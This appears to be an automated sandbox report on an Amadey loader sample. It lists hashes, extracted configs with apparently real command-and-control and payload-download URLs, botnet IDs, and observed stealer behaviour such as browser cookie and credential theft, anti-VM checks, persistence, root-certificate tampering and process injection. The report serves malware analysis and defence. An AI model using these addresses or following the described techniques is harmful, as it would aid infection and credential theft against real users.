amadey | 7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d

Analysis

max time kernel
70s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06/03/2025, 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
Size

938KB
MD5

c9c266737131c566122595220c28e0bd
SHA1

55a14ae5976cd04ac14e360c3ec0c22022f1d129
SHA256

7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d
SHA512

b8c23aad7ae2aa022e8d6a1d53beccbca78d4d8282318c6cd571478438c99e36293dcd24a3761764400925b4dd63c5794ffdf01e5096b181dd998c93a8a2c665
SSDEEP

24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:zTvC/MTQYxsWR7a06

Score

10^/10

amadey healer litehttp stealc vidar 092155 ir7am traff1 bot credential_access defense_evasion discovery dropper execution persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

http://185.208.156.162/page.php

Attributes

key
v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

stealc

Botnet

traff1

Attributes

url_path
/gtthfbsb2h.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 13 IoCs

stealer

resource	yara_rule
behavioral1/memory/552-188-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-197-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-194-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-192-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-190-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-201-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-889-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-908-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-913-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-935-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-932-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-957-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/552-976-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral1/memory/3976-2356-0x0000000000940000-0x0000000000D9C000-memory.dmp	healer
behavioral1/memory/3976-2355-0x0000000000940000-0x0000000000D9C000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
LiteHTTP
LiteHTTP is an open-source bot written in C#.
stealer bot litehttp
Litehttp family
litehttp
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rXOl0pp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ILqcVeT.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2252	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2092	powershell.exe
3784	powershell.exe
4008	powershell.exe
1324	powershell.exe
2504	powershell.exe
2252	powershell.exe
584	powershell.exe
3740	powershell.exe
3856	powershell.exe
584	powershell.exe

Downloads MZ/PE file 10 IoCs

flow	pid	Process
4	2252	powershell.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe
7	1656	rapes.exe

Uses browser remote debugging 2 TTPs 40 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1588	chrome.exe
3124	chrome.exe
3224	chrome.exe
3268	chrome.exe
4068	chrome.exe
3780	chrome.exe
660	chrome.exe
3976	chrome.exe
3860	chrome.exe
3272	chrome.exe
2324	chrome.exe
348	chrome.exe
3380	chrome.exe
2952	chrome.exe
2092	chrome.exe
3648	chrome.exe
288	chrome.exe
3752	chrome.exe
2592	chrome.exe
3432	chrome.exe
3768	chrome.exe
3228	chrome.exe
3812	chrome.exe
756	chrome.exe
3268	chrome.exe
3212	chrome.exe
2432	chrome.exe
1628	chrome.exe
692	chrome.exe
2516	chrome.exe
1044	chrome.exe
3008	chrome.exe
3700	chrome.exe
3132	chrome.exe
2412	chrome.exe
1404	chrome.exe
1356	chrome.exe
1700	chrome.exe
2212	chrome.exe
1664	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x00050000000193c4-165.dat	net_reactor
behavioral1/memory/2300-177-0x0000000000D80000-0x0000000000DE0000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe

Executes dropped EXE 16 IoCs

pid	Process
2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
1656	rapes.exe
2556	zY9sqWs.exe
2380	PcAIvJ0.exe
1628	v6Oqdnc.exe
2568	MCxU5Fj.exe
3016	MCxU5Fj.exe
2488	ce4pMzk.exe
2300	mAtJWNv.exe
552	mAtJWNv.exe
900	FvbuInU.exe
992	Ps7WqSx.exe
2712	nhDLtPT.exe
1948	Gxtuum.exe
348	ILqcVeT.exe
3420	rXOl0pp.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	rXOl0pp.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine	ILqcVeT.exe

Loads dropped DLL 41 IoCs

pid	Process
2252	powershell.exe
2252	powershell.exe
2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
2928	WerFault.exe
2928	WerFault.exe
2928	WerFault.exe
1656	rapes.exe
2568	MCxU5Fj.exe
2736	WerFault.exe
2736	WerFault.exe
2736	WerFault.exe
2736	WerFault.exe
2736	WerFault.exe
2956	WerFault.exe
2956	WerFault.exe
2956	WerFault.exe
2956	WerFault.exe
2956	WerFault.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
2300	mAtJWNv.exe
1860	WerFault.exe
1860	WerFault.exe
1860	WerFault.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
2712	nhDLtPT.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe
1656	rapes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\zHoisLDD\\Anubis.exe\""	ce4pMzk.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000d00000001d7c5-2103.dat	autoit_exe
behavioral1/files/0x0009000000017403-2436.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
1656	rapes.exe
1628	v6Oqdnc.exe
900	FvbuInU.exe
348	ILqcVeT.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2568 set thread context of 3016	2568	MCxU5Fj.exe	50
PID 2300 set thread context of 552	2300	mAtJWNv.exe	55

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
File created	C:\Windows\Tasks\Gxtuum.job	nhDLtPT.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 8 IoCs

pid	pid_target	Process	procid_target
2928	1628	WerFault.exe	46
2736	2568	WerFault.exe	49
2956	3016	WerFault.exe	50
1860	2300	WerFault.exe	54
1736	1324	WerFault.exe	125
2096	828	WerFault.exe	129
1952	3420	WerFault.exe	78
2044	3080	WerFault.exe	178

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ps7WqSx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhDLtPT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ILqcVeT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ILqcVeT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ILqcVeT.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
3820	timeout.exe
2388	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3884	taskkill.exe
3532	taskkill.exe
2456	taskkill.exe
3640	taskkill.exe
3284	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	FvbuInU.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	FvbuInU.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	FvbuInU.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2260	schtasks.exe
2952	schtasks.exe
788	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2252	powershell.exe
2252	powershell.exe
2252	powershell.exe
2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
1656	rapes.exe
584	powershell.exe
584	powershell.exe
584	powershell.exe
2092	powershell.exe
1628	v6Oqdnc.exe
2488	ce4pMzk.exe
2488	ce4pMzk.exe
2488	ce4pMzk.exe
2488	ce4pMzk.exe
900	FvbuInU.exe
900	FvbuInU.exe
900	FvbuInU.exe
900	FvbuInU.exe
900	FvbuInU.exe
2504	powershell.exe
348	ILqcVeT.exe
348	ILqcVeT.exe
348	ILqcVeT.exe
3008	chrome.exe
3008	chrome.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2488	ce4pMzk.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe
Token: SeShutdownPrivilege	3008	chrome.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
2712	nhDLtPT.exe
3008	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 2276	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	28
PID 1048 wrote to memory of 2276	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	28
PID 1048 wrote to memory of 2276	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	28
PID 1048 wrote to memory of 2276	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	28
PID 1048 wrote to memory of 2416	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	29
PID 1048 wrote to memory of 2416	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	29
PID 1048 wrote to memory of 2416	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	29
PID 1048 wrote to memory of 2416	1048	7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe	29
PID 2276 wrote to memory of 2260	2276	cmd.exe	31
PID 2276 wrote to memory of 2260	2276	cmd.exe	31
PID 2276 wrote to memory of 2260	2276	cmd.exe	31
PID 2276 wrote to memory of 2260	2276	cmd.exe	31
PID 2416 wrote to memory of 2252	2416	mshta.exe	32
PID 2416 wrote to memory of 2252	2416	mshta.exe	32
PID 2416 wrote to memory of 2252	2416	mshta.exe	32
PID 2416 wrote to memory of 2252	2416	mshta.exe	32
PID 2252 wrote to memory of 2684	2252	powershell.exe	34
PID 2252 wrote to memory of 2684	2252	powershell.exe	34
PID 2252 wrote to memory of 2684	2252	powershell.exe	34
PID 2252 wrote to memory of 2684	2252	powershell.exe	34
PID 2684 wrote to memory of 1656	2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE	35
PID 2684 wrote to memory of 1656	2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE	35
PID 2684 wrote to memory of 1656	2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE	35
PID 2684 wrote to memory of 1656	2684	TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE	35
PID 1656 wrote to memory of 2556	1656	rapes.exe	37
PID 1656 wrote to memory of 2556	1656	rapes.exe	37
PID 1656 wrote to memory of 2556	1656	rapes.exe	37
PID 1656 wrote to memory of 2556	1656	rapes.exe	37
PID 1656 wrote to memory of 2380	1656	rapes.exe	38
PID 1656 wrote to memory of 2380	1656	rapes.exe	38
PID 1656 wrote to memory of 2380	1656	rapes.exe	38
PID 1656 wrote to memory of 2380	1656	rapes.exe	38
PID 2380 wrote to memory of 900	2380	PcAIvJ0.exe	39
PID 2380 wrote to memory of 900	2380	PcAIvJ0.exe	39
PID 2380 wrote to memory of 900	2380	PcAIvJ0.exe	39
PID 900 wrote to memory of 584	900	cmd.exe	41
PID 900 wrote to memory of 584	900	cmd.exe	41
PID 900 wrote to memory of 584	900	cmd.exe	41
PID 584 wrote to memory of 2092	584	powershell.exe	42
PID 584 wrote to memory of 2092	584	powershell.exe	42
PID 584 wrote to memory of 2092	584	powershell.exe	42
PID 1656 wrote to memory of 1628	1656	rapes.exe	46
PID 1656 wrote to memory of 1628	1656	rapes.exe	46
PID 1656 wrote to memory of 1628	1656	rapes.exe	46
PID 1656 wrote to memory of 1628	1656	rapes.exe	46
PID 1628 wrote to memory of 2928	1628	v6Oqdnc.exe	48
PID 1628 wrote to memory of 2928	1628	v6Oqdnc.exe	48
PID 1628 wrote to memory of 2928	1628	v6Oqdnc.exe	48
PID 1628 wrote to memory of 2928	1628	v6Oqdnc.exe	48
PID 1656 wrote to memory of 2568	1656	rapes.exe	49
PID 1656 wrote to memory of 2568	1656	rapes.exe	49
PID 1656 wrote to memory of 2568	1656	rapes.exe	49
PID 1656 wrote to memory of 2568	1656	rapes.exe	49
